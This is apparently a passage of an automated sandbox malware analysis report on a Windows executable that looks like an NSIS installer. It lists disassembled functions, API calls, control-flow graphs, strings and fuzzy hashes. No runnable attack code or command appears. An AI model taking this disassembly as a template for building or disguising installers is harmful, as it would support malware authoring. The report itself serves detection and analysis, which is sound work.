                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CF7
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                                              • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                              • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                              • API String ID: 2035342205-3630010723
                                                              • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                              • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                              • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                              • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                              Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                              • FindClose.KERNEL32(00000000), ref: 004068CB
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsbB152.tmp, xrefs: 004068B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 2295610775-627501760
                                                              • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                              • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                              • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                              • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                              Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                                              • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                              • Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                                              • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                              Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 332 403fd7-403fe9 333 404150-40415f 332->333 334 403fef-403ff5 332->334 336 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 333->336 337 4041ae-4041c3 333->337 334->333 335 403ffb-404004 334->335 340 404006-404013 SetWindowPos 335->340 341 404019-404020 335->341 336->337 338 404203-404208 call 404522 337->338 339 4041c5-4041c8 337->339 354 40420d-404228 338->354 344 4041ca-4041d5 call 401389 339->344 345 4041fb-4041fd 339->345 340->341 347 404022-40403c ShowWindow 341->347 348 404064-40406a 341->348 344->345 370 4041d7-4041f6 SendMessageW 344->370 345->338 353 4044a3 345->353 355 404042-404055 GetWindowLongW 347->355 356 40413d-40414b call 40453d 347->356 350 404083-404086 348->350 351 40406c-40407e DestroyWindow 348->351 360 404088-404094 SetWindowLongW 350->360 361 404099-40409f 350->361 358 404480-404486 351->358 359 4044a5-4044ac 353->359 364 404231-404237 354->364 365 40422a-40422c call 40140b 354->365 355->356 366 40405b-40405e ShowWindow 355->366 356->359 358->353 373 404488-40448e 358->373 360->359 361->356 369 4040a5-4040b4 GetDlgItem 361->369 367 404461-40447a DestroyWindow EndDialog 364->367 368 40423d-404248 364->368 365->364 366->348 367->358 368->367 375 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 368->375 376 4040d3-4040d6 369->376 377 4040b6-4040cd SendMessageW IsWindowEnabled 369->377 370->359 373->353 374 404490-404499 ShowWindow 373->374 374->353 404 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 375->404 405 40429d-4042a2 375->405 379 4040d8-4040d9 376->379 380 4040db-4040de 376->380 377->353 377->376 382 404109-40410e call 4044af 379->382 383 4040e0-4040e6 380->383 384 4040ec-4040f1 380->384 382->356 387 404127-404137 SendMessageW 383->387 388 4040e8-4040ea 383->388 384->387 389 4040f3-4040f9 384->389 387->356 388->382 392 404110-404119 call 40140b 389->392 393 4040fb-404101 call 40140b 389->393 392->356 402 40411b-404125 392->402 400 404107 393->400 400->382 402->400 408 4042e3-4042e4 404->408 409 4042e6 404->409 405->404 410 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 408->410 409->410 411 404318-404329 SendMessageW 410->411 412 40432b 410->412 413 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 411->413 412->413 413->354 424 404376-404378 413->424 424->354 425 40437e-404382 424->425 426 4043a1-4043b5 DestroyWindow 425->426 427 404384-40438a 425->427 426->358 429 4043bb-4043e8 CreateDialogParamW 426->429 427->353 428 404390-404396 427->428 428->354 430 40439c 428->430 429->358 431 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 429->431 430->353 431->353 436 404447-40445a ShowWindow call 404522 431->436 438 40445f 436->438 438->358
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                              • ShowWindow.USER32(?), ref: 00404033
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                              • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                              • DestroyWindow.USER32 ref: 00404072
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                              • GetDlgItem.USER32(?,?), ref: 004040AA
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                              • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                              • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                              • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                              • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                              • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                              • EnableWindow.USER32(?,?), ref: 004042D9
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                              • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                              • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                              • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID:
                                                              • API String ID: 121052019-0
                                                              • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                              • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                              • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                              • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                              Function 00403C29 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 439 403c29-403c41 call 40694b 442 403c43-403c53 call 40649e 439->442 443 403c55-403c8c call 406425 439->443 451 403caf-403cd8 call 403eff call 405f2e 442->451 447 403ca4-403caa lstrcatW 443->447 448 403c8e-403c9f call 406425 443->448 447->451 448->447 457 403d6a-403d72 call 405f2e 451->457 458 403cde-403ce3 451->458 463 403d80-403da5 LoadImageW 457->463 464 403d74-403d7b call 406594 457->464 458->457 459 403ce9-403d11 call 406425 458->459 459->457 469 403d13-403d17 459->469 467 403e26-403e2e call 40140b 463->467 468 403da7-403dd7 RegisterClassW 463->468 464->463 482 403e30-403e33 467->482 483 403e38-403e43 call 403eff 467->483 472 403ef5 468->472 473 403ddd-403e21 SystemParametersInfoW CreateWindowExW 468->473 470 403d29-403d35 lstrlenW 469->470 471 403d19-403d26 call 405e53 469->471 477 403d37-403d45 lstrcmpiW 470->477 478 403d5d-403d65 call 405e26 call 406557 470->478 471->470 476 403ef7-403efe 472->476 473->467 477->478 481 403d47-403d51 GetFileAttributesW 477->481 478->457 485 403d53-403d55 481->485 486 403d57-403d58 call 405e72 481->486 482->476 492 403e49-403e63 ShowWindow call 4068db 483->492 493 403ecc-403ecd call 4056af 483->493 485->478 485->486 486->478 500 403e65-403e6a call 4068db 492->500 501 403e6f-403e81 GetClassInfoW 492->501 496 403ed2-403ed4 493->496 498 403ed6-403edc 496->498 499 403eee-403ef0 call 40140b 496->499 498->482 506 403ee2-403ee9 call 40140b 498->506 499->472 500->501 504 403e83-403e93 GetClassInfoW RegisterClassW 501->504 505 403e99-403ebc DialogBoxParamW call 40140b 501->505 504->505 509 403ec1-403eca call 403b79 505->509 506->482 509->476
                                                              APIs
                                                                • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                              • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403CAA
                                                              • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,75573420), ref: 00403D2A
                                                              • lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                              • GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                              • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                              • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-931941464
                                                              • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                              • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                              • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                              • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                              Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 513 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 516 4030d2-4030d7 513->516 517 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 513->517 518 4032b2-4032b6 516->518 525 403110 517->525 526 4031f5-403203 call 40301e 517->526 528 403115-40312c 525->528 533 403205-403208 526->533 534 403258-40325d 526->534 530 403130-403139 call 4034d4 528->530 531 40312e 528->531 538 40325f-403267 call 40301e 530->538 539 40313f-403146 530->539 531->530 536 40320a-403222 call 4034ea call 4034d4 533->536 537 40322c-403256 GlobalAlloc call 4034ea call 4032b9 533->537 534->518 536->534 560 403224-40322a 536->560 537->534 564 403269-40327a 537->564 538->534 542 4031c2-4031c6 539->542 543 403148-40315c call 406002 539->543 547 4031d0-4031d6 542->547 548 4031c8-4031cf call 40301e 542->548 543->547 562 40315e-403165 543->562 555 4031e5-4031ed 547->555 556 4031d8-4031e2 call 406a38 547->556 548->547 555->528 563 4031f3 555->563 556->555 560->534 560->537 562->547 566 403167-40316e 562->566 563->526 567 403282-403287 564->567 568 40327c 564->568 566->547 569 403170-403177 566->569 570 403288-40328e 567->570 568->567 569->547 572 403179-403180 569->572 570->570 571 403290-4032ab SetFilePointer call 406002 570->571 575 4032b0 571->575 572->547 574 403182-4031a2 572->574 574->534 576 4031a8-4031ac 574->576 575->518 577 4031b4-4031bc 576->577 578 4031ae-4031b2 576->578 577->547 579 4031be-4031c0 577->579 578->563 578->577 579->547
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403093
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400), ref: 004030AF
                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 004030FB
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-3874380391
                                                              • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                              • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                              • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                              • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                              Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 580 406594-40659d 581 4065b0-4065ca 580->581 582 40659f-4065ae 580->582 583 4065d0-4065dc 581->583 584 4067da-4067e0 581->584 582->581 583->584 585 4065e2-4065e9 583->585 586 4067e6-4067f3 584->586 587 4065ee-4065fb 584->587 585->584 589 4067f5-4067fa call 406557 586->589 590 4067ff-406802 586->590 587->586 588 406601-40660a 587->588 591 406610-406653 588->591 592 4067c7 588->592 589->590 596 406659-406665 591->596 597 40676b-40676f 591->597 594 4067d5-4067d8 592->594 595 4067c9-4067d3 592->595 594->584 595->584 598 406667 596->598 599 40666f-406671 596->599 600 406771-406778 597->600 601 4067a3-4067a7 597->601 598->599 606 406673-406691 call 406425 599->606 607 4066ab-4066ae 599->607 604 406788-406794 call 406557 600->604 605 40677a-406786 call 40649e 600->605 602 4067b7-4067c5 lstrlenW 601->602 603 4067a9-4067b2 call 406594 601->603 602->584 603->602 614 406799-40679f 604->614 605->614 619 406696-406699 606->619 609 4066b0-4066bc GetSystemDirectoryW 607->609 610 4066c1-4066c4 607->610 615 40674e-406751 609->615 616 4066d6-4066da 610->616 617 4066c6-4066d2 GetWindowsDirectoryW 610->617 614->602 622 4067a1 614->622 620 406753-406756 615->620 623 406763-406769 call 406805 615->623 616->615 624 4066dc-4066fa 616->624 617->616 619->620 621 40669f-4066a6 call 406594 619->621 620->623 626 406758-40675e lstrcatW 620->626 621->615 622->623 623->602 628 4066fc-406702 624->628 629 40670e-406726 call 40694b 624->629 626->623 633 40670a-40670c 628->633 637 406728-40673b SHGetPathFromIDListW CoTaskMemFree 629->637 638 40673d-406746 629->638 633->629 635 406748-40674c 633->635 635->615 637->635 637->638 638->624 638->635
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
                                                              • GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 004066CC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                              • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 0040675E
                                                              • lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 004067B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4024019347-2401076859
                                                              • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                              • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                              • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                              • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                              Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
